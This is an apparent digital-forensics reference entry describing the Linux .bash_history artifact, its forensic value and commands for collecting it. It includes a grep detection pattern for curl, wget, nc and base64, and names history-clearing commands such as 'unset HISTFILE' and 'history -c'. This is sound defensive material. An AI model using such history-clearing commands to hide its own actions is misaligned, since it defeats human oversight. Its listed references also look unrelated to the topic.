.bash_history (Shell History)

LinuxExecution EvidenceDisk Image

Location

/home/<username>/.bash_history and /root/.bash_history

Description

Per-user command history file recording shell commands entered in interactive Bash sessions. May also include .zsh_history, .ash_history, or .python_history depending on the shell and tools used.

Forensic Value

Shell history provides a direct record of attacker commands including reconnaissance (whoami, id, uname -a), lateral movement (ssh, scp), data staging (tar, zip), and exfiltration (curl, wget, scp to external IPs). Sophisticated attackers may clear history (unset HISTFILE, history -c), but partially written history files and timestamps (if HISTTIMEFORMAT was set) often survive. Always check all user accounts including service accounts.

Tools Required

catgrepfindstrings

Collection Commands

find

find /home /root -name ".*_history" -exec cp --parents {} /forensics/output/ \;

cat

cat /root/.bash_history > /forensics/output/root_bash_history.txt

grep

grep -rn "curl\|wget\|ssh\|scp\|nc\|base64" /home/*/.bash_history > /forensics/output/suspicious_cmds.log

find

find /home /root -name ".zsh_history" -o -name ".python_history" | xargs -I{} cp --parents {} /forensics/output/

Collection Constraints

•Paths and log sources vary by distribution, init system, logging stack, and installed packages. Validate the active distro and service set before treating absence as meaningful.

MITRE ATT&CK Techniques

T1059.004T1552.003T1083T1070.003

References

systemd.timer Manual NetworkManager Keyfile Format sshd_config Manual systemd-resolved Service

Acquisition Methods

UAC (Unix-like Artifacts Collector)

linux — triage

tar Logical Collection

linux — logical

Velociraptor Offline Collector (Linux)

linux — triage